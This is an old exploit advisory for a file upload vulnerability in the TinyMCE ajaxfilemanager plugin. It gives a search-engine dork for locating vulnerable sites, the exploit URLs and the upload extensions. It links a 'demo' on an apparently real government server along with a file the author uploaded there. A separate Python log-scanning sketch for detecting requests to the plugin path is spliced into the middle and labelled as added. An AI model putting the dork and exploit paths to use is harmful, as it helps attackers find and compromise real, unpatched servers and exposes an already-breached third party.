TinyMCE ajaxfilemanager Upload Vulnerability
Web References:
http://packetstormsecurity.org/files/101793/TinyMCE-AjaxFileManager-Shell-Upload.html
http://secunia.com/advisories/44760/
http://securityreason.com/wlb_show/WLB-2011050108
#########################################################
# Title : TinyMCE ajaxfilemanager Upload Vulnerability
# Author: Dr Trojan
# Greets to all my friends and everyone I know (www.paksecteam.com)
# Vendor: http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/
# Email : urduhack@gmail.com
# Date : 29/05/2011
# Dork : "tiny_mce/plugins/ajaxfilemanager"
# Category : PHP [File Upload Vulnerability]
# Tested on: [Windows 7, Linux Ubuntu]
#########################################################
Exploit
# http://[localhost]/[path]/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
# http://[localhost]/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
# File Extension [.txt],[.jpg],[.gif],[.bmp]
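
Detection note (added example, not part of the original advisory): the plugin path above is the indicator a defender can search for. This Python sketch scans web server access logs, assumed to be in Combined Log Format, for requests to the plugin directory and lists clients that made a successful POST; the function names and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote

# Path fragment taken from the advisory's dork and exploit URLs.
PLUGIN_FRAGMENT = "tiny_mce/plugins/ajaxfilemanager/"

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalise(target):
    """Decode and lower-case the request path so encoded or mixed-case hits match."""
    path = unquote(urlsplit(target).path).lower()
    return re.sub(r"/{2,}", "/", path)

def find_plugin_hits(lines):
    """Return {client_ip: [(timestamp, method, path, status), ...]} for plugin requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed log format
        path = normalise(m["target"])
        if PLUGIN_FRAGMENT in path:
            hits[m["ip"]].append((m["ts"], m["method"], path, int(m["status"])))
    return dict(hits)

def successful_posts(hits):
    """Clients with a 2xx POST to the plugin directory: review these first."""
    return sorted(
        ip for ip, reqs in hits.items()
        if any(meth == "POST" and 200 <= st < 300 for _, meth, _, st in reqs)
    )

# Constructed sample log lines (documentation-range IPs), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [29/May/2011:10:01:02 +0000] "GET /jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.7 - - [29/May/2011:10:01:40 +0000] "POST /jscripts/Tiny_MCE/plugins/ajaxfilemanager/ajaxfilemanager.php HTTP/1.1" 200 312 "-" "-"',
    '198.51.100.4 - - [29/May/2011:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "-"',
    '192.0.2.9 - - [29/May/2011:10:03:00 +0000] "GET /tiny_mce/plugins/ajaxfilemanager%2Fajaxfilemanager.php HTTP/1.1" 404 210 "-" "-"',
]

if __name__ == "__main__":
    hits = find_plugin_hits(SAMPLE_LOG)
    for ip, reqs in hits.items():
        print(ip, reqs)
    print("successful POSTs from:", successful_posts(hits))
```

A 404 on the plugin path usually means the host was probed but does not serve the plugin; a 2xx POST means the file manager is reachable and the upload directory should be inspected.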
Demo
http://sns.yhgs.gov.cn/plugins/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php#
Preview
http://sns.yhgs.gov.cn/uploaded/temp/trojan.txt